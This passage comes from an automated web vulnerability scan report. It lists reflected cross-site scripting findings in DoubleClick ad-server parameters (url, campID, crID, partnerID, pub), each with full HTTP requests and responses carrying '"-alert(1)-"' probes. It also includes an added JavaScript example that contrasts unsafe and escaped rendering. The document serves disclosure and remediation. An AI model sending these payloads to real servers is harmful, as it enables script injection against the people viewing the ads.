Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8941

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
leclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%
...[SNIP]...

4.7. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb197"-alert(1)-"30566853739 was submitted in the url parameter. This input was echoed unmodified in the application's response. The response excerpt below shows the sink more completely than the other findings: the reflected value runs up to the closing "); and is then assigned to the variable the creative uses for its click-through (var fscUrl = url;), so an injected expression executes when the ad's script is parsed, before any click.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9127

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_im_f_anb_op_ScrFr_pk_300x250%26priorityCode%3D4654900000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...
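The fragment above, the reflected value closed by "); and followed by var fscUrl = url;, shows the sink: the whole click= segment of the request path is written into a double-quoted string literal in the ad's script. The following JavaScript is an added example, not code from the CloudScan report or from DoubleClick's ad server (whose source is not on this page). It reproduces the unsafe rendering in the template shape inferred from that fragment, puts a hardened encoder beside it, and runs a scanner-style check for the probe. The function names, the var url = ("...") template and the shortened probe URL are assumptions; only the "-alert(1)-" marker and the var fscUrl = url; line come from the report.

```javascript
// Added example, not the report's or DoubleClick's code. The template shape
// `var url = ("...");` is inferred from the response fragment in finding 4.7;
// all names are hypothetical.

// Constructed probe: a shortened click URL carrying the marker from finding 4.5.
const PROBE_MARKER = '8b3b5"-alert(1)-"6e28e40048e';
const PROBE_URL =
  'http://t.invitemedia.com/track_click?auctionID=1&pubICode=1502951' +
  PROBE_MARKER + '&pub=58661&redirectURL=';

// Unsafe rendering: the click URL is concatenated straight into the literal.
function renderClickTagVulnerable(clickUrl) {
  return 'var url = ("' + clickUrl + '");\nvar fscUrl = url;\n';
}

// JavaScript-string encoder: anything outside a conservative allow-list is
// emitted as \xHH (or \uHHHH above U+00FF). This neutralises " ' \ / < > and
// the line terminators U+2028/U+2029 that an HTML or URL encoder would miss.
function jsStringEscape(s) {
  return s.replace(/[^A-Za-z0-9 .,:;_\-?=&%]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hardened rendering: same template, encoded value. Because the encoder acts
// on the data, not the template, the output is always exactly one literal.
function renderClickTagSafe(clickUrl) {
  return 'var url = ("' + jsStringEscape(clickUrl) + '");\nvar fscUrl = url;\n';
}

// Minimal lexer: count the double-quoted string literals in a statement,
// honouring backslash escapes. The vulnerable output yields two: the probe's
// first " closed the literal and its second " reopened one.
function countStringLiterals(js) {
  let count = 0;
  let inString = false;
  for (let i = 0; i < js.length; i++) {
    const ch = js[i];
    if (inString && ch === '\\') { i++; continue; } // skip the escaped char
    if (ch === '"') {
      if (!inString) count++;
      inString = !inString;
    }
  }
  return count;
}

// Scanner-style check behind the report's "echoed unmodified" verdict: is the
// marker, quotes intact, present inside a <script> block of the response?
function probeReflectedInScript(body, marker) {
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(body)) !== null) {
    if (m[1].includes(marker)) return true;
  }
  return false;
}

// Wrap a rendering in the creative's <script> so the check sees what a
// browser would parse.
function creativeHtml(renderer) {
  return '<html><body><script>\n' + renderer(PROBE_URL) + '</script></body></html>';
}

// Self-demo when run directly (node example.js).
console.log('vulnerable literals:', countStringLiterals(renderClickTagVulnerable(PROBE_URL)));
console.log('hardened literals:  ', countStringLiterals(renderClickTagSafe(PROBE_URL)));
console.log('probe reflected (vulnerable):', probeReflectedInScript(creativeHtml(renderClickTagVulnerable), PROBE_MARKER));
console.log('probe reflected (hardened):  ', probeReflectedInScript(creativeHtml(renderClickTagSafe), PROBE_MARKER));
```

The encoder is deliberately an allow-list: escaping only the quotation mark would still let </script> end the block at the HTML parser, and leaving U+2028/U+2029 through breaks the literal in engines that treat them as line terminators. Because every escape decodes back to the original character, the hardened literal is lossless, which is what lets the click-through keep working while the probe is rendered inert.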

4.8. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26dad"-alert(1)-"eeefcf6670b was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%
...[SNIP]...

4.9. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a686a"-alert(1)-"12363754579 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype
...[SNIP]...

4.10. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4ac"-alert(1)-"f286bd5be45 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%
...[SNIP]...

4.11. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ae1"-alert(1)-"d5a8c8b632 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

